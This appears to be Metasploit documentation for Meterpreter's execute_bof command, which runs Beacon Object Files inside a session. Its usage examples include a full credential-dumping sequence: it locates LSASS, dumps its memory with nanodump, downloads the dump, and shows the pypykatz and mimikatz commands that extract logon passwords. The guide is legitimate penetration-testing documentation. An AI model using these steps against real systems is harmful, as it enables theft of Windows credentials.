This guide outlines how to use the Meterpreter execute_bof
command as provided by the bofloader
extension. It allows a Meterpreter session to execute “Beacon Object Files” or BOF files for short. A BOF is a Common Object File Format (COFF) executable file with an API of standard functions defined in beacon.h.
The bofloader
extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java Meterpreter even when running on the Windows platform.
Execution Environment
Warning: The execution environment is shared with the Meterpreter process. If there is an exception or the BOF crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated session to avoid losing access altogether.
The loader and execution environment are provided by trustedsec/COFFLoader. The extension is therefor subject to the same limitations.
The following functions are unavailable:
1 The token functions are defined and present, but will only effect the execution of the BOF and not the Meterpreter runtime environment.
Currently, there is only one output stream. All output data processed by BeaconOutput
and BeaconPrintf
is combined into that stream. BOFs should not use this for outputting binary data.
The bofloader
extension provides exactly one command, through which all of the provided functionality is accessed.
execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]
– Compile the input file (requires mingw).-e
– The entry point (default:go
– Argument format-string. See details below.
The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The standard beacon.h file will be in the include path automatically. In this case, the input file is treated as a C source file instead of compiled data.
Entry Point
Once loaded the loader will call the BOF entry point. By default, this value is go
. The entry point option can change it to another valid function to call instead.
Argument Format-String
The execute_bof
command is capable of serializing arguments to be sent to the BOF for execution. The user must define the data type of each argument that the BOF file expecting to see. This information would come from either reading the BOF’s documentation or source code. Incorrectly specifying the arguments or omitting them entirely can result in the BOF crashing and the Meterpreter session dying.
BOF argument types are defined in the format string argument with -f
/ --format-string
The following table describes each of the types.
Type | Description | Unpack With (C) |
b | binary data (e.g. 01020304, file:/path/to/file.bin)1 | BeaconDataExtract |
i | 32-bit integer (e.g. 0x1234, 5678)2 | BeaconDataInt |
s | 16-bit integer (e.g. 0x1234, 5678)2 | BeaconDataShort |
z | null-terminated utf-8 string | BeaconDataExtract |
Z | null-terminated utf-16 string | (wchar_t *)BeaconDataExtract |
1 Binary data arguments are specified as either a stream of hex characters or as the path to a file local to the Metasploit Framework instance. In the case of a file path, it must be prefixed with file:
2 Integer arguments are specified as either decimal or hexadecimal literals.
Unknown arguments are treated as BOF arguments. Additionally, any arguments after the --
terminator are explicitly treated as BOF arguments. Using the terminator allows ambiguous arguments to such as --help
to be forward to the BOF instead of being processed locally. The number of BOF arguments to be forward must equal number of characters in the argument format string.
Usage Examples
Executing dir, passing the path argument and number of sub-directories to list.
meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
Contents of C:\*:
08/05/2022 15:17 <dir> $Recycle.Bin
08/05/2022 15:16 <junction> Documents and Settings
09/22/2022 08:35 1342177280 pagefile.sys
08/05/2022 16:48 <dir> PerfLogs
09/08/2022 12:51 <dir> Program Files
09/15/2018 05:06 <dir> Program Files (x86)
08/05/2022 15:26 <dir> ProgramData
09/07/2022 10:24 <dir> Python27
08/05/2022 15:16 <dir> Recovery
08/05/2022 15:40 <dir> System Volume Information
08/05/2022 15:16 <dir> Users
09/01/2022 13:49 <dir> Windows
1342177280 Total File Size for 1 File(s)
11 Dir(s)
meterpreter >
Executing nanodump. First the PID of LSASS is found, then the argument string is constructed. The output must be written to disk. Once completed, the dump file can be downloaded from the remote host.
meterpreter > ps lsass
Filtering on 'lsass'
Process List
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
712 556 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
meterpreter > execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 "" 0 0 0 ""
Done, to download the dump run:
download nanodump.dmp
to get the secretz run:
python3 -m pypykatz lsa minidump nanodump.dmp
mimikatz.exe "sekurlsa::minidump nanodump.dmp" "sekurlsa::logonPasswords full" exit
meterpreter > download nanodump.dmp
[*] Downloading: nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
[*] download : nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
meterpreter >
- for Cobalt Strike’s BOF documentation
- beacon.h source code for the BOF API
- TrustedSec/COFFLoader for the source code of the loader
- trustedsec/CS-Situational-Awareness-BOFF for a collection of useful BOFs